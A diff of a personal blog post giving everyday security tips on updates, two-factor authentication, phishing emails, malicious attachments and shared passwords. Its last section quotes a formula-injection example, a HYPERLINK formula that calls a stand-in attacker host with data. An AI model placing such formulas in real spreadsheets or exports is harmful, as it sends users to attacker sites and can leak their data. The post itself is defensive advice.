amejiarosario/amejiarosario.github.io/source/_posts/2019-01-24-I-got-hacked-and-It-changed-my-life-on-security-tips.md

   - Keep all your devices, operating systems and dependencies up-to-date.
 Most well-known vulnerabilities are fixed shortly after they are reported.

 ## Email security tips
   - Have ** 2-factor authentication** on your emails.
 If someone gets access to your primary email, then they can use `forgot password` on many sites (Evernote, Bank Accounts) and change the password.
-I heard of somebody that got their email compromised, in turn, the hacker got access to their Evernote and found some passwords to their cryptocurrency exchanges and got robbed big time.
+I heard of somebody that got their email compromised; in turn, the hacker got access to their Evernote and found some passwords to their cryptocurrency exchanges and got robbed big time.
 Don't be that guy.
 Enable 2FA.
   - Be aware of phishing emails.
 No, Bill Gates won't share his fortune and donate you a million, nor you won any lottery.
 Don't trust any email saying that you won money or any price.
 Also, be aware of fake company emails asking for you to log in somewhere.
 The site might look very similar, but it's a trap!
 They want to capture your password.
 Check the domain carefully or even better yet don't click on any link from the email and type your company web address directly as you usually do.
   - Be aware of malicious attachments.
 Specially executables (*.exe, *.bat, *.sh, *.zip).
 See also Microsoft documents part.
 Everything that can run arbitrary code on your computer should not be trusted.

 ## Social Media
   - Enable all the security options they have like 2 Factor authentication, SMS confirmation.
+  - Don't share passwords with your friends or change them afterwards.

 ## Microsoft Documents
   - If you use your documents locally or by trusted peers, you shouldn't have many problems.
 However, for auto-generated documents like (*.csv) that you download from emails or compromised websites they can change data or insert malicious links (`=HYPERLINK("[http://attacker.com?some='data](http://attacker.com/?some=%27data%27)')`) and take you to their websites.